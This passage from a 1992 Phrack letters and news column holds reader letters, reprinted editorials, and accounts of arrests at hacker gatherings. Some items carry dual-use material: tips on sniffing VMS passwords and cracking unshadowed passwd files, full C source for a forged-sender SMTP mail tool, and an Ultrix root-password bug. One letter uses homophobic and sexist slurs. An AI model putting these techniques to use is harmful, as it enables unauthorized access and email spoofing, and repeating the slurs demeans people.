+comments and questions, I decided to post mine.  First of all, please forgive
+the English.  I'm French and can't help it :-)
+
+My comment:  When I saw in the index that this issue was dealing with BT
+Tymnet, I felt very happy because I was looking for such information.  And when
+I read it, I felt really disappointed.  Toucan Jones could have reduced his
+whole article with the following lines:
+
+-> Find any Tymnet number.
+-> Dial and wait for the "Please log-in:" prompt.
+-> Log as user "help", no password required.
+-> Capture everything you want, it's free public information.
+
+I must say I was a bit surprised to find this kind of article in a high-quality
+magazine such as yours...
+
+My question:  I'm currently trying to find out everything about a neat AS/400
+I've "found," but I never saw any "hack report" on it.  Do you know if there
+are any available?
+
+OK - Let's see if you answer.  We feel somewhat lonely here in the Old
+Continent...but Phrack is here to keep the challenge up!
+
+Regards,
+
+      >  Otto Sync  <
+
+----------
+
+From: Anonymous
+Date: August 19, 1992
+Subject: BT Tymnet article in Phrack 40
+
+Dear Phrack Staff,
+
+The BT Tymnet article in the 40th issue of Phrack was totally lame.  I hate it
+when people enter Telenet or Tymnet's information facility and just buffer all
+the sh*t that's in there.  Then they have the audacity to slap their name on
+the data as if they had made a major network discovery.  That's so f*ck*ng
+lame!
+
+Phrack should make a policy not to accept such lame sh*t for their fine
+magazine.  Is Phrack *that* desperate for articles?  Crap like commercial dial-
+up lists is about as lame as posting a few random pages from the front of the
+white pages.  The information is quickly outdated and easily available at any
+time to anyone.  You don't hack this sh*t.
+
+Regards,
+
+Anonymous (anonymous because I don't want to hear any lame flames)
+
+[Editor's Response:  We agree that buffering some dialup list is not hacking,
+                     however, in this specific case, a decision was made that
+                     not everyone had ready access to the information or even
+                     knew of its existence.  Furthermore and more relevant to
+                     why the article appeared in Phrack, an article on Tymnet
+                     was appropriate when considering the recent events with
+                     the MOD case in New York.
+
+                     In the future, you may ask that your letter be printed
+                     anonymously, but don't send us anonymous mail.]
+
+----------
+
+From: Doctor Pizz
+Date: October 12, 1992
+Subject: Phrack fraud?
+
+I recently received an ad from someone who was selling the full set of Phrack
+back issues for $100.00.  I do believe that this is a violation of your rights
+to Phrack, as he is obviously selling your work for profit!
+
+The address I received to order these disks was:
+
+     R.E. Jones
+     21067 Jones-Mill
+     Long Beach, MS   39560
+
+It seems he is also selling the set of NIA files for $50, a set of "Hacking
+Programs" for $40, LOD Tech Journals for $25, and lots of viruses.  It sounds
+like some sort of copyright violation, or fraud, as he is selling public domain
+stuff for personal profit.  At least you should be aware of this.  Anyway, I
+look forward to receiving future volumes of Phrack!  Keep up the good work.
+
+Good luck in stopping this guy!
+
+Thank you,
+
+--Doctor Pizz--
+
+[Editor's Note: We look forward to hearing what our Phrack readers think about
+                people selling hardcopies of Phrack for their own personal
+                profit.]
+
+----------
+
+From: Synaps a/k/a Clone1 a/k/a Feyd
+Date: September 2, 1992
+Subject: Remarks & Warning!
+
+Hi,
+
+I've been a regular reader of Phrack for two years now and I approve fully the
+way you continue Phrack.  It's really a wonderful magazine and if I can help
+its development in France, I'll do as much as I can!  Anyway, this is not
+really the goal of my letter and excuse me for my English, which isn't very
+good.
+
+My remarks are about the way you distribute Phrack.  Sometimes, I don't receive
+it fully.  I know this is not your fault and I understand that (this net
+sometimes has some problems!).  But I think you could provide a mail server
+like NETSERV where we could get back issues by mail and just by MAIL (no FTP).
+
+Some people (a lot in France) don't have any access to international FTP and
+there are no FTP sites in France which have ANY issues of Phrack.  I did use
+some LISTSERV mailers with the send/get facility.  Could you install it on your
+ LISTSERV?
+
+My warning is about a "group" (I should say a pseudo-group) founded by Jean
+Bernard Condat and called CCCF.  In fact, the JBC have spread his name through
+the net to a lot of people in the Underground.  As the Underground place in
+France is weak (the D.S.T, anti-hacker staff is very active here and very
+efficient), people tend to trust JBC.  He seems (I said SEEMS) to have a good
+knowledge in computing, looks kind, and has a lot of resources.  The only
+problem is that he makes some "sting" (as you called it some years ago)
+operation and uses the information he spied to track hackers.  He organized a
+game last year which was "le prix du chaos" (the amount of chaos) where he
+asked hackers to prove their capabilities.
+
+It was not the real goal of this challenge.  He used all the materials hackers
+send him to harass some people and now he "plays" with the normal police and
+the secret police (DST) and installs like a trade between himself and them.
+It's really scary for the hacking scene in France because a lot of people trust
+him (even the television which has no basis to prove if he is really a hacker
+as he claims to be or if he is a hacker-tracker as he IS!).  Journalists take
+him as a serious source for he says he leads a group of computer enthusiasts.
+
+But we discovered that his group doesn't exist.  There is nobody in his group
+except his brother and some other weird people (2 or 3) whereas he says there
+is 73 people in his club/group.  You should spread this warning to everybody in
+the underground because we must show that "stings" are not only for USA!  I
+know he already has a database with a lot of information like addresses and
+other stuff like that about hackers and then he "plays" with those hackers.
+
+Be very careful with this guy.  Too many trust him.  Now it's time to be
+"objective" about him and his group!
+
+Thanks a lot and goodbye.
+
+         Synaps a/k/a Clone1 a/k/a Feyd
+
+----------
+
+From: Ken Martin <70712.760@compuserve.com>
+Date: November 17, 1992
+Subject: One Ron Hults...(Phrack 38 Loopback)
+
+Dear Phrack Staff:
+
+This letter is concerning the letter in the Phrack Loopback column (#38, April
+20, 1992) written by one Ron Hults.  It suggests that all children should be
+disallowed access to a computer with a modem.
+
+The news release to which it is attached attempts to put an idea in the
+reader's mind that everything out there (on bulletin boards) is bad.  Anyone
+who can read messages from "satanic cultists, pedophile, and rapists" can also
+read a typical disclaimer found on most bulletin boards which have adult
+material and communication areas available to their users, and should be able
+to tell the SysOp of a BBS how old he/she is.
+
+A child who is intelligent enough to operate a computer and modem should also
+be able to decide what is appropriate for him/her to read, and should have the
+sense enough to avoid areas of the BBS that could lead to trouble, and not to
+give their address and home phone number to the Charles Manson idols.  (It is a
+fact that all adolescents have thoughts about sex; nothing can change that.
+The operator of a BBS also has the moral responsibility to keep little kids out
+of the XXX-Rated GIF downloading area.)
+
+One problem with that is BBSes run by the underground type (hack/phreak, these
+usually consist of people from 15-30 years of age).  The operators of these let
+practically anyone into their system, from my experiences.  These types of
+BBSes often have credit card numbers, telephone calling card numbers, access
+codes to credit reporting services, etc., usually along with text-file
+documents about mischievous topics.  Mr. Hults makes no mention of these in his
+letter and press release.  It is my belief that these types of systems are the
+real problem.  The kids are fascinated that, all of a sudden, they know how to
+make explosives and can get lots of anything for free.
+
+I believe that the parents of children should have the sense enough to watch
+what they are doing.  If they don't like the kind of information that they're
+getting or the kind of messages that they're sending to other users, then that
+is the time to restrict access to the modem.
+
+I am fifteen years old, and I can say that I have gotten into more than my
+share of trouble with the law as a result of information that I have obtained
+from BBSes and public communications services like CompuServe.  The computer is
+a tool, and it always will be.  Whether it is put to good use or not depends on
+its user.  I have put my computer/modem to use in positive applications more
+than destructive ones.
+
+I would like Mr. Hults to think about his little idea of banning children from
+modem use, and to think about the impact it would have on their education.
+Many schools use computers/modems in their science and English curriculums for
+research purposes.
+
+Banning children from telecommunications is like taking away connection to the
+outside world and all forms of publication whatsoever when one takes a look
+around a large information service like CompuServe or GEnie, and sees all of
+the information that a service like this is capable of providing to this
+nation.
+
+Thanks,
+
+Ken Martin (70712.760@compuserve.com)
+a.k.a. Scorpion, The Omega Concern, Dr. Scott
+
+----------
+
+From: Stalker
+Date: October 14, 1992
+Subject: Hacking In Czecho-Slovakia
+
+Hi there!
+
+I'm student from Czecho-Slovakia (for some stupid person who doesn't know, it's
+in middle Europe).  Call me Stalker (if there is other guy with this name, call
+me what you want).  If you think that computers, networks, hacking and other
+interesting things are not in Eastern Europe, you're WRONG.  I won't talk
+about politicians. They really make me (and other men from computers) sick!
+I'll tell you what is interesting here right now.
+
+Our university campus is based on two main systems, VMS and ULTRIX.  There's
+VAX 6000, VAX 4000, MicroVAX, VAXStation and some oldtimer machines which run
+under VMS.  As for hacking, there's nothing interesting.  You can't do some
+tricks with /etc/passwd, there's no main bug in utilities and commands.  But,
+as I know, VMS doesn't crypt the packets across the network so you can take
+some PC and Netwatch (or any other useful software ) and try to see what
+is interesting on the cable.  You can grab anything that you want (usernames,
+passwords, etc.).
+
+Generally, students hate VMS and love UNIX-like systems.  Other machines are
+based on ULTRIX.  We have DECstations (some 3100, some 5000) and one SM 52-12
+which is something on VAX-11 :-(.  It is a really slow machine, but it has
+Internet access!  There's many users so you can relatively easily run Crack
+(excellent program) since passwd is not shadowed.  Another useful thing is tftp
+(see some other Crack issues).  There was a machine with enabled tftp, but
+after one incident, it was disabled.
+
+I would like to tell you more about this incident but sysadmins are still
+suspecting (they probably read my mail).  Maybe after some months in other
+articles.  Now I can tell you that I'm not a real UNIX-GURU-HACKER, but the
+sysadmins thought that I was.  Someone (man or girl, who knows) has hacked one
+(or two) machines on our campus.  Administrators thought that I was this
+mysterious hacker but I am not!  He/she is much better than I and my friends.
+Today no one knows who the hacker is.  The administrator had talked to him/her
+and after some weeks, gave him/her an account.  He/she probably had root
+privileges for some time and maybe has these today.  He/she uses a modem to
+connect.  His/her login name is nemo (Jules Verne is a popular hero).  I will
+try to send mail to him/her about Phrack and maybe he/she will write
+interesting articles about himself.
+
+And some tips.  Phrack is very interesting, but there's other interesting
+official files on cert.org (192.88.209.9) available via anonymous FTP.  This
+is the Computer Emergency Response Team (CERT) FTP server.  You can find
+interesting information here about bugs in actual software, but you will see
+only which command or utility has the bug, not how to exploit it.  If you are
+smart enough, there's nothing to say.
+
+If you are not, you must read Phrack!  :-)
+
+Bye,
+
+Stalker
+
+----------
+
+From: Ground Zero
+Date: August 25, 1992
+Subject: Phrack 40 is Sexist!
+
+Hi, just a quick comment about Phrack's account of SummerCon:
+
+I don't think your readers need to know or are really interested in hearing
+about the fact that Doc Holiday was busy trying to pick up girls or that there
+were some unbalanced teeny-boppers there offering themselves to some of the
+SummerCon participants.  Also, as a woman I don't care for your
+characterizations of females in that file.
+
+I'm not trying to nitpick or be politically correct (I hate PC), I'm just
+writing because I felt strongly enough about it.  Ciao.
+
+Ground Zero (Editor of Activist Times, Inc./ATI)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+From: Shit Kickin' Jim
+Date: September 11, 1992
+Subject: Phrack 40 is Sexist!? (PC Phrack)
+
+Listen here woman.  I don't know whut yer big fat butt thinks Phrack wuz tryin'
+to insinuate.  Lemme tell yew a thang er two.  First of all, Phrack ain't run
+by some little pip-squeek faggot ass pansies.  Ah mean wut are you sum kinda
+hOmOsexual?  Here's what ah mean.  NOW here iz a real story 'bout me and one a
+my bestest friends: 4x4 Phreaker.
+
+See 4x4 Phreaker come down to Texas fur a little hackin adventure.  Even though
+he lives up there in Yankee-land, 4x4 Phreaker iz a pretty good ol' boy.
+Whuddya think real manly hackers do when they get together?  Go stop by Radio
+Shack and buy shrink wrap?
+
+HELL NO!  We fuckin' went to Caligula XXI.  Fur yew ol' boys that ain't from
+'round here er yer a fauygut out there that might be readin this, Caligula XXI
+specializes in enertainmunt fer gennelmen.
+
+Now, me and 4x4 Phreaker didn't go to hawk at some fat nasty sluts like you
+might see at your typical Ho-Ho Con.  We went with the purpose in mind of seein
+a real movie star.  Yup Christy Canyon was in the house that night.  4x4
+Phreaker and me sat down at a table near the front.  At that point I decided
+that I'd start trollin for babes.  Yep that's right I whipped out an American
+Express Corporate Gold card.  And I'll be damned if it weren't 3 minutes later
+me and 4x4 Phreaker had us 2 new found friends for the evening.
+
+So anywayz, yew can see we treated these two fine ladies real nice and they
+returned the favor.  We even took em to Waffle House the next mornin'.  So I
+dunno where yew git off by callin us sexist.  Yer just some Yankee snob big
+city high horse woman who expects to be a takin care of.
+
+God bless George Bush and his mistress Jennifer whutz her name.
+
+:Shit Kickin' Jim (Madder than a bramer bull fightin a mess of wet hornets)
+
+_______________________________________________________________________________
+
+ Misunderstood Hackers Get No Respect                           August 10, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by The Cruiser (ComputerWorld)(Page 24)(Letters to the Editor)
+
+I just read the replies to Chris Goggans' "Hackers aren't the real enemy"
+[ComputerWorld, June 29], and I thought I'd address a few of the points brought
+up.  I'm a hacker -- which means that I'm every system administrator's
+nightmare.
+
+Hardly.  Many hackers are politically aware activists.  Besides being fueled by
+an obsession for mastering technology (I call it a blatant disregard for such),
+true hackers live and obey a strict moral code.
+
+All this talk about the differences between voyeurism and crime:  Please, let's
+stop comparing information access to breaking into someone's house.  The
+government can seize computers and equipment from suspected hackers, never to
+return it, without even charging a crime.  I will not sit back and let Big
+Brother control me.
+
+The Cruiser
+_______________________________________________________________________________
+
+ Hackers Should Land In Jail, Not In Press                     October 19, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Alan Falk (ComputerWorld)(Page 32)(Letters to the Editor)
+
+The letters you get from avowed hackers seem to glorify the virtues of hacking.
+I find this very disturbing for a simple reason:  It completely ignores the
+issue of private property.
+
+The computer systems they hack into (pun intended) and the databases they try
+to access, as well as the data in the databases, are private property.
+
+An analogous argument might be that breaking and entering a jewelry store and
+taking off with some valuables is really a way of testing the security controls
+at the jeweler's establishment.  They're really just doing it for the
+excitement and challenge.
+Would they promote voyeurism based on the "logic" that "after all, if they
+didn't want me to look, they'd have pulled the drapes closer together?"
+
+The fact that there's challenge or excitement involved (or even commitment,
+intellect or whatever) does not change the issue.
+
+I suggest that hackers who gain entry to systems against the wishes of the
+systems' owners should be treated according to the laws regarding unlawful
+entry, theft, etc.
+
+Alan Falk
+Cupertino, California
+_______________________________________________________________________________
+
+ Anonymous Usenet Posting?
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+Date: August 19, 1992
+From: Anonymous
+
+I've read in Phrack all about the different ways to send fake mail, but do any
+of the readers (or Mind Mage) know anything about anonymous newsgroup posting?
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Anonymous Mail Poster                                           August 4, 1992
+ ~~~~~~~~~~~~~~~~~~~~~
+ by Sir Hackalot
+
+Here is some C source to a simple "anonymous" mail poster that I wrote a LONG
+time ago.  It's just one of many pieces of code I never gave to anyone before.
+You may find it useful.  Basically, it will connect to the SMTP port and
+automate the sending.  It will allow for multiple recipients on the "To:" line,
+and multiple "To:" lines.
+
+From: sirh@sirh.com
+
+------ Cut here for fm.c -----
+#include <stdio.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <signal.h>
+#include <fcntl.h>
+#include <errno.h>
+
+
+int openSock(name,port)
+char *name;
+int port;
+
+{
+      int mysock,opt=1;
+      struct sockaddr_in sin;
+      struct hostent *he;
+      he = gethostbyname(name);
+      if (he == NULL) {
+            printf("No host found..\n");
+            exit(0);
+      }
+
+      memcpy((caddr_t)&sin.sin_addr,he->h_addr_list[0],he->h_length);
+      sin.sin_port = port;
+
+      sin.sin_family = AF_INET;
+
+      mysock = socket(AF_INET,SOCK_STREAM,0);
+
+      opt = connect(mysock,(struct sockaddr *)&sin,sizeof(sin));
+
+      return mysock;
+
+}
+
+/* This allows us to have many people on one TO line, seperated by
+   commas or spaces. */
+
+process(s,d)
+int d;
+char *s;
+{
+      char *tmp;
+      char buf[120];
+
+      tmp = strtok(s," ,");
+
+      while (tmp != NULL) {
+            sprintf(buf,"RCPT TO: %s\n",tmp);
+            write(d,buf,strlen(buf));
+            tmp = strtok(NULL," ,");
+      }
+
+}
+
+
+
+getAndSendFrom(fd)
+int fd;
+{
+      char from[100];
+      char outbound[200];
+
+      printf("You must should specify a From address now.\nFrom: ");
+      gets(from);
+
+      sprintf(outbound,"MAIL FROM: %s\n",from);
+      write(fd,outbound,strlen(outbound));
+
+
+
+}
+
+getAndSendTo(fd)
+int fd;
+{
+      char addrs[100];
+
+      printf("Enter Recipients, with a blank line to end.\n");
+
+      addrs[0] = '_';
+
+      while (addrs[0] != '\0') {
+            printf("To: ");
+            gets(addrs);
+            process(addrs,fd);
+      }
+
+}
+
+getAndSendMsg(fd)
+int fd;
+{
+      char textline[90];
+      char outbound[103];
+
+      sprintf(textline,"DATA\n");
+      write(fd,textline,strlen(textline));
+
+
+      printf("You may now enter your message.  End with a period\n\n");
+      printf("[---------------------------------------------------------]\n");
+
+      textline[0] = '_';
+
+      while (textline[0] != '.') {
+            gets(textline);
+            sprintf(outbound,"%s\n",textline);
+            write(fd,outbound,strlen(outbound));
+      }
+
+}
+
+
+main(argc,argv)
+int argc;
+char *argv[];
+{
+
+      char text[200];
+      int file_d;
+
+      /* Get ready to connect to host. */
+      printf("SMTP Host: ");
+      gets(text);
+
+      /* Connect to standard SMTP port. */
+      file_d = openSock(text,25);
+
+      if (file_d < 0) {
+            printf("Error connecting to SMTP host.\n");
+            perror("smtp_connect");
+            exit(0);
+      }
+
+      printf("\n\n[+ Connected to SMTP host %s +]\n",text);
+
+      sleep(1);
+
+      getAndSendFrom(file_d);
+
+      getAndSendTo(file_d);
+
+      getAndSendMsg(file_d);
+
+      sprintf(text,"QUIT\n");
+      write(file_d,text,strlen(text));
+
+    /* Here we just print out all the text we got from the SMTP
+       Host.  Since this is a simple program, we didnt need to do
+       anything with it. */
+
+    printf("[Session Message dump]:\n");
+      while(read(file_d,text,78) > 0)
+            printf("%s\n",text);
+      close(file_d);
+}
+----- End file fm.c
+_______________________________________________________________________________
+
+From: Andy Panda-Bear
+Date: September 25, 1992
+Subject: Phrack on the move
+
+To Whom It May Concern:
+
+I love reading your Phrack articles and find them very, very informative as
+well as helpful.  I was wondering in you've ever or plan to put together a
+compendium of related articles.  For instance, you could make a Phrack guide to
+telephony and include all telephone/telecommunications articles.  Perhaps a
+"Phrack Guide to UNIX" or "Phrack Guide to Internet" could be produced.  It
+could have reprints of past articles along with commentaries by individuals who
+care to share their knowledge.  Anyway it's just something to think about.
+
+Thanks for many megabytes of useful info and keep it coming.
+
+      Later,
+
+      Andy Panda-Bear
+
+----------
+
+ Computer Underground Publications Index
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Amadeus
+
+I just finished the new edition of the Phrack Index, now called the Computer
+Underground Publications Index since it now includes the issues of the Legion
+of Doom Tech Journals and Informatik.
+
+You can get it from ftp.uu.net as /tmp/CUPindex
+
+I have already sent it to da folks at CUD so that they may enter it into their
+archives.
+
+The CUP has been updated to included all the Phracks up to 40.
+
+C'ya
+
+Amadeus
+_______________________________________________________________________________
+
+ Pirates v. AT&T: Posters                                        August 8, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ by Legacy Irreverent (legacy@cpu.cyberpnk1.sai.com)
+
+On May 24 1992, two lone Pirates, Legacy of CyberPunk System, and Captain
+Picard of Holodeck, had finally had enough of AT&T.  Together, they traveled to
+the AT&T Maintenance Facility, just west of Goddard, Kansas, and claimed the
+property in the name of Pirates and Hackers everywhere.  They hoisted the Jolly
+Roger skull and crossbones high on the AT&T flagpole, where it stayed for 2
+days until it was taken down by security.
+
+This event was photographed and videotaped by EGATOBAS Productions, to preserve
+this landmark in history.  And now you can witness the event.  For a limited
+time we are offering a 11" x 17" full color poster of the Jolly Roger Pirate
+flag flying high over AT&T, with the AT&T logo in plain view, with the caption;
+"WE CAME, WE SAW, WE CONQUERED."  These are $5.50 each and are laminated.
+
+Also available, by request is a 20" x 30" full color photograph, and a cotton
+T-shirt with the same full color picture on the front, for $20 each.
+
+If you are interested in purchasing any of the above items, simply send check
+or money order for the amount to:
+
+CyberPunk System
+P.O. Box 771027
+Wichita, KS  67277-1072
+
+A GIF of this is also available from CyberPunk System, 1:291/19, 23:316/0,
+72:708/316, 69:2316/0.  FREQ magicname PIRATE
+
+Any questions, send them to Legacy@cpu.cyberpnk1.sai.com
+
+_______________________________________________________________________________
+
+ Ultrix 4.2 Bug
+ ~~~~~~~~~~~~~~
+ By Krynn
+
+A bug was discovered in Ultrix 4.2 upgrade version.  It involves npasswd, and
+root.  It is quite simple, and a patch/fix is available.  Here is a description
+of the hole:
+
+Sys Admin's username:  mradmin
+Any user's username :  mruser
+
+Okay, mruser has forgotten his password, which isn't good.  Mruser goes to
+mradmin and asks mradmin to change his password to newpass.  Mradmin does so.
+
+Mradmin now will su to root, and npasswd mruser.  He will enter mruser's new
+password, newpasswd.  It will appear in the /etc/passwd that mruser's password
+is a "*" (shadowed), and that it has been changed, but it hasn't.
+
+The password changed was root's, meaning root's password is now newuser.
+
+A fix is available via anonymous ftp at:
+
+black.ox.ac.uk /src/npasswd.enhanced.shar.Z
+
+The original is there as /src/npasswd jpl.tar.Z
+_______________________________________________________________________________
+
+ PumpCon Hosed                                                 November 5, 1992
+ ~~~~~~~~~~~~~
+ by Phil "The Outlander"
+
+PumpCon '92 was held this past weekend at the Westchester Courtyard by
+Marriott, and was shut down in spades.
+
+It began like any typical hacker/phreak/cyberpunk's convention, with lots of
+beer, lots of shooting the bull, and lots of people from around the country,
+except that the guests got sloppy, stupid, noisy, and overconfident.
+
+The manager of the hotel, accompanied by three town of Greenborough police
+officers, entered the room at approximately 10pm on Saturday.  The manager had
+received complaints about noise and vandalism from some of the hotel's other
+guests.  She claims to have tried to call the room several times before
+physically entering, but the room's telephone line was consistently busy.
+
+The police officers noticed the multiple open (and empty) beer bottles
+scattered around the room and were gearing up to make some arrests for
+"Unlawful Possession of Alcoholic Beverages by Underage Persons" when one of
+the policemen spotted an Amiga, connected to a US Robotics modem, which was in
+turn connected to the suite's phone line.  The "stolen" calling card was all
+the probable cause necessary to upgrade the charges to "Wire Fraud."
+
+Everyone in the suite was detained for questioning.  Standard investigation
+procedure was followed.  The entire case was handled by local authorities,
+including the Westchester County DA.  To my knowledge, the FBI and Bell
+Security people were not called in (or if they were, it was after I was
+released).
+
+Each detainee was body-searched for diskettes, hand-written notes about credit
+and computer services, autodialers, and the like.  The suite where PumpCon had
+taken place was also searched.  Hardware seized includes at least two Amigas
+with monitors, modems, and diskettes, and one AT&T dumb terminal with modem.
+
+Each of the detainees was interviewed in turn.  Just before dawn on the morning
+of Sunday, November 1st, the police began making the actual arrests.  Four to
+eight people were arrested and taken to the local jail.
+
+The rest of the detainees were released with no charges or arrests filed.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+And now on a personal note to anybody who is new to the world of hacking:
+
+Many of the attendees to PumpCon '92 were just like me.  I was aware of the
+possible consequences of an arrest, but the full enormity of the possibilities
+hadn't sunk in.  Getting busted can really ruin your life, and I am unwilling
+to sacrifice my liberty and get a criminal record just for the thrill of
+hanging out with the "eleet."
+
+I was personally terrified out of my skull and went right off any dreams I had
+of being some kind of big-time cyberpunk.  The law had us outgunned ten to one
+(literally and figuratively) and I as I write this on Monday night I still
+haven't stopped shaking.
+
+To anyone who hasn't considered what it would be like to get seriously busted,
+I want you to try and picture the scene that night, and comes the dawn, a lot
+of the people you were partying with just twelve hours earlier are carted away
+in handcuffs to face an uncertain future.
+
+The attendees of PumpCon, including myself and with few exceptions, were utter
+and complete fools.  They thought that they could act like jerks, bust up the
+hotel, and phreak off the room lines without bringing down the heat like a jet
+of molten lava.  They thought they were too smart to get caught.  They thought
+that they were immortal.  They thought wrong, and now some of them are going to
+pay for it.
+
+I got lucky.  I was released, and I learned some invaluable lessons.
+
+I can't stress enough to anybody out there who is treating the state of the
+Hack like it's a big game:  You aren't going to get your marbles back when the
+night is over.  The stakes are real.  Ask yourself if you can deal with the
+possibilities of ruining your life before it's even begun.
+
+Everyone must make their own decision.  You are only given this one chance to
+bail out now; any others that come along are blessings from on high.
+
+If you do decide to live in the computer underground, I can only offer this
+advice:  Cover your a$$.  Do not act foolishly.  Do not associate with fools.
+Remember that you are not immortal, and that ultimately there are no safety
+nets.  Intelligence can't always save you.  Do not, in your arrogance, believe
+that it will.  My time as a cyberpunk has been short and undistinguished but it
+has taught me this much.
+
+I'm not saying that you should not become a hacker.  If that is truly your
+wish, then I'm not one to stop you.  I'm just warning you that when the fall
+comes, it can come hard, and there's nobody who can help you when you've gone
+far enough past the line.
+
+     Phil "The Outlander"
+_______________________________________________________________________________
+
+ 2600 Meeting Disrupted by Law Enforcement                    December 12, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Emmanuel Goldstein (Editor of 2600 Magazine)
+
+The following is a letter I wrote to the Washington Post in response to their
+article about the incidents at the Pentagon City Mall on November 6, entitled,
+"Hackers Allege Harassment at Mall" (dated November 13, page A1).  Their
+article failed to focus on the startling revelation of federal government
+involvement and the ominous implications of such an action.  The article also
+does little to lessen the near hysteria that is pumped into the general public
+every time the word "hacker" is mentioned.
+
+Let us take a good look at what has been confirmed so far.  A group of computer
+hackers gathered at a local mall as they do once a month.  Similar meetings
+have been going on in other cities for years without incident.  This gathering
+was not for the purposes of causing trouble and nobody has accused the hackers
+of doing anything wrong.  Rather, the gathering was simply a place to meet and
+socialize.  This is what people seem to do in food courts and it was the
+hackers' intention to do nothing more.
+
+When mall security personnel surrounded the group and demanded that they all
+submit to a search, it became very clear that something bizarre was happening.
+Those who resisted were threatened with arrest.  Everyone's names were written
+down, everyone's bags gone through.  One person attempted to write down the
+badge numbers of the people doing this.  The list was snatched out of his hand
+and ripped to pieces.  Another hacker attempted to catch the episode on film.
+He was apprehended and the film was ripped from his camera.  School books,
+notepads, and personal property were seized.  Much of it has still not been
+returned.  The group was held for close to an  hour and then told to stay out
+of the mall or be arrested.
+
+This kind of treatment is enough to shock most people, particularly when
+coupled with the overwhelming evidence and eyewitness accounts confirming no
+unusual or disruptive behavior on the part of the group.  It is against
+everything that our society stands for to subject people to random searches and
+official intimidation, simply because of their interests, lifestyles, or the
+way they look.  This occurrence alone would warrant condemnation of a blatant
+abuse of power.  But the story doesn't end there.
+
+The harassment of the hackers by the mall police was only the most obvious
+element.  Where the most attention should be focused at this point is on the
+United States Secret Service which, according to Al Johnson, head of mall
+security, "ramrodded" the whole thing.  Other media sources, such as the
+industry newsletter Communications Daily, were told by Johnson that the Secret
+Service was all over the mall that day and that they had, in effect, ordered
+the harassment.  Arlington police confirm that the Secret Service was at the
+mall that day.
+
+It is understood that the Secret Service, as a branch of the Treasury
+Department, investigates credit card fraud.  Credit card fraud, in turn, can be
+accomplished through computer crime.  Some computer hackers could conceivably
+use their talents to accomplish computer crime.  Thus we arrive at the current
+Secret Service policy, which appears to treat everybody in the hacker world as
+if they were a proven counterfeiter.  This feeling is grounded in
+misperceptions and an apprehension that borders on panic.  Not helping the
+situation any is the ever-present generation gap -- most hackers are young and
+most government officials are not.
+
+Apart from being disturbed by the gross generalizations that comprise their
+policy, it seems a tremendous waste of resources to use our Secret Service to
+spy on public gatherings in shopping malls.  It seems certain to be a violation
+of our rights to allow them to disrupt these meetings and intimidate the
+participants, albeit indirectly.  Like any other governmental agency, it is
+expected that the Secret Service follow the rules and not violate the
+constitutional rights of citizens.
+
+If such actions are not publicly condemned, we will in effect be granting a
+license for their continuance and expansion.  The incident above sounds like
+something from the darkest days of the Soviet Union when human rights activists
+were intimidated by government agents and their subordinates.  True, these are
+technology enthusiasts, not activists.  But who they are is not the issue.  We
+cannot permit governmental abuse of any person or group simply because they may
+be controversial.
+
+Why do hackers evoke such controversy?  Their mere presence is an inconvenience
+to those who want so desperately to believe the emperor is wearing clothes.
+Hackers have a tendency of pointing out the obvious inadequacies of the
+computer systems we entrust with such a large and growing part of our lives.
+Many people don't want to be told how flimsily these various systems are held
+together and how so much personal data is readily available to so many.
+Because hackers manage to demonstrate how simple it is to get and manipulate
+this information, they are held fully responsible for the security holes
+themselves.
+
+But, contrary to most media perceptions, hackers have very little interest in
+looking at other people's personal files.  Ironically, they tend to value
+privacy more than the rest of us because they know firsthand how vulnerable it
+is.  Over the years, hackers have gone to the media to expose weaknesses in our
+credit reporting agencies, the grading system for New York City public schools,
+military computer systems, voice mail systems, and even commonly used push
+button locks that give a false sense of security.  Not one of these examples
+resulted in significant media attention and, consequently, adequate security
+was either delayed or not implemented at all.
+
+Conversely, whenever the government chooses to prosecute a hacker, most media
+attention focuses on what the hacker "could have done" had he been malicious.
+This reinforces the inaccurate depiction of hackers as the major threat to our
+privacy and completely ignores the failure of the system itself.
+
+By coming out publicly and meeting with other hackers and non-hackers in an
+open atmosphere, we have dispelled many of the myths and helped foster an
+environment conducive to learning.  But the message we received at the Pentagon
+City Mall tells us to hide, be secretive, and not trust anybody.  Perhaps
+that's how the Secret Service wants hackers to behave.  But we are not
+criminals and we refuse to act as such simply because we are perceived that way
+by uninformed bureaucrats.
+
+Regardless of our individual outlooks on the hacker issue, we should be
+outraged and extremely frightened to see the Secret Service act as they did.
+Whether or not we believe that hackers are decent people, we must agree that
+they are entitled to the same constitutional freedoms the rest of us take for
+granted.  Any less is tantamount to a very dangerous and ill-advised precedent.
+
+     Emmanuel Goldstein
+     Editor, 2600 Magazine -- The Hacker Quarterly (516)751-2600
+
+(NOTE: 2600 Magazine coordinates monthly hacker meetings throughout the
+       country.)
+_______________________________________________________________________________
+
+ Two New Hardcovers                                           November 24, 1992
+ ~~~~~~~~~~~~~~~~~~
+ by Alan J. Rothman (New York Law Journal)(Page 5)
+
+During the opening sequence of the classic English television series "The
+Prisoner," the lead character known only as Number 6 (brilliantly played by
+Patrick McGoohan) is abducted and taken to a secret location called "The
+Village."  He desperately pleads with his captors "What do you want?"  Their
+grim response is "Information."  Through 17 thrilling episodes, his kidnappers
+staged elaborate high-tech ruses to find out why he quit work as a spy.
+
+Had this story been set in the 1990s rather than the 1960s, all The Village's
+proprietors would have needed was a PC and a modem.  They could have assembled
+a composite of Number 6's movements by cross-referencing records from any of
+the commercial data bases containing the details of nearly everyone's daily
+activities.  Then with a bit of ingenuity, they could have tried to steal even
+more information by hacking into other restricted data systems.
+
+No longer fiction, but common fact, the billowing growth in the computers and
+telecommunications networks everywhere is generating urgent legal issues
+regarding the content, usage and ownership of the data coursing through them.
+Dilemmas have also surfaced concerning the responsibilities of the businesses
